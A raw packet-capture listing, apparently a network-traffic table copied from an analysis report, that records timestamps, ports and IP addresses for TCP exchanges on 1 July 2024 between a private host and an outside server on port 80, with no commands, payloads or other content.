                        Jul 1, 2024 13:58:02.081090927 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.081132889 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.081146002 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.082281113 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.082334042 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.082367897 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.082397938 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.082410097 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.088788033 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.126312971 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.126418114 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.126441956 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.126493931 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.126559973 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.126595020 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.126635075 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.126635075 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.126635075 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.126640081 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.126677036 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.126727104 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.126759052 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.126806021 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.126806021 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.126806021 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.126808882 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.126843929 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.126893044 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.126898050 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.126925945 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.126960993 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.126970053 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.126970053 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.127012014 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.127012014 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.127049923 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.127059937 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.127084970 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.127110958 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.127118111 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.127130985 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.127151012 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.127166986 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.127202988 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.127214909 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.127238035 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.127271891 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.127305984 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.127327919 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.127327919 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.127327919 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.127353907 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.127357006 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.127391100 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.127420902 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.127424955 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.127437115 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.127475023 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.127490997 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.127516031 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.127523899 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.127549887 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.127568007 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.127585888 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.127629042 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.127629042 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.127644062 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.127676964 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.127708912 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.127711058 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.127723932 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.127746105 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.127779961 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.127799988 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.127799988 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.127813101 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.127831936 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.127849102 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.127860069 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.127882004 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.127918959 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.127924919 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.127924919 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.127952099 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.127979040 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.127985001 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.128014088 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.128019094 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.128052950 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.128077984 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.128077984 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.128086090 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.128108025 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.128119946 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.128153086 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.128180027 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.128180027 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.128185987 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.128199100 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.128221035 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.128237009 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.128253937 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.128274918 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.128288984 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.128317118 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.128320932 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.128331900 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.128354073 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.128376961 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.128390074 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.128411055 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.128422976 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.128457069 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.128457069 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.128470898 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.128500938 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.128523111 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.128570080 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.133629084 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.133769035 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.134129047 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.134180069 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.134206057 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.134213924 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.134229898 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.134264946 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.134270906 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.134319067 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.134324074 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.134371042 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.134393930 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.134404898 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.134433031 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.134438992 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.134474039 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.134476900 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.134476900 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.134507895 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.134542942 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.134566069 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.134579897 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.134613037 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.134645939 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.134654999 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.134654999 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.134696960 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.134702921 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.134731054 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.134759903 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.134763956 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.134792089 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.134799004 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.134849072 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.134865046 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.134865046 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.134900093 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.134903908 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.134937048 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.134955883 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.134970903 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.134994984 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.135004997 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.135037899 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.135046959 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.135046959 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.135072947 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.135107040 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.135138988 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.135143995 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.135143995 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.135143995 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.135171890 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.135179996 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.135205984 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.135229111 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.135238886 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.135252953 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.135272980 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.135281086 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.135305882 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.135329008 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.135339022 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.135370970 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.135374069 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.135401964 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.135410070 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.135441065 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.135442972 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.135452986 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.135477066 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.135497093 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.135509968 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.135524988 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.135546923 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.135575056 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.135580063 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.135616064 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.135616064 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.135648012 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.135651112 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.135669947 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.135685921 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.135719061 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.135730982 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.135730982 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.135752916 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.135773897 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.135787010 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.135802031 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.135819912 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.135852098 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.135853052 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.135865927 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.135886908 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.135920048 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.135929108 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.135929108 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.135956049 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.135962963 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.136012077 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.215082884 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.215109110 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.215122938 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.215137005 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.215151072 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.215167046 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.215192080 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.215205908 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.215219021 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.215234995 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.215250969 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.215255022 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.215255022 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.215255022 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.215255022 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.215255022 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.215255022 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.215255022 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.215284109 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.215297937 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.215313911 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.215328932 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.215380907 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.215419054 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.215434074 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.215449095 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.215462923 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.215462923 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.215481043 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.215502024 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.215516090 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.215521097 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.215521097 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.215521097 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.215521097 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.215540886 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.215563059 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.215563059 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.215580940 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.215580940 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.215598106 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.215614080 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.215631962 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.215631962 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.215666056 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.215682030 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.215697050 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.215711117 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.215725899 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.215727091 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.215747118 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.215750933 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.215750933 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.215771914 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.215797901 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.215805054 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.215820074 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.215873957 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.215898037 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.215914011 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.215926886 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.215944052 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.215977907 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.215977907 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.215977907 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.215991020 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.216001987 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.216017008 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.216046095 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.216061115 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.216065884 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.216085911 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.216104984 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.216120005 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.216129065 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.216134071 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.216157913 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.216169119 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.216185093 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.216218948 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.216234922 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.216270924 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.216284990 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.216305971 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.216319084 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.216319084 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.216320038 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.216337919 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.216337919 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.216350079 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.216418982 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.216434002 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.216448069 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.216463089 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.216489077 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.216489077 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.216489077 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.216504097 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.216600895 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.216617107 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.216630936 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.216645002 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.216659069 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.216660976 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.216675043 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.216677904 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.216691017 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.216701984 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.216720104 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.216720104 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.216751099 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.216767073 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.216790915 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.216805935 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.216808081 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.216840029 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.216840029 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.216877937 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.216892004 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.216907024 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.216922045 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.216938972 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.216947079 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.216947079 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.216953993 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.216975927 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.216980934 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.217040062 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.217053890 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.217070103 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.217112064 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.217112064 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.217112064 CEST4916480192.168.2.2231.192.235.145
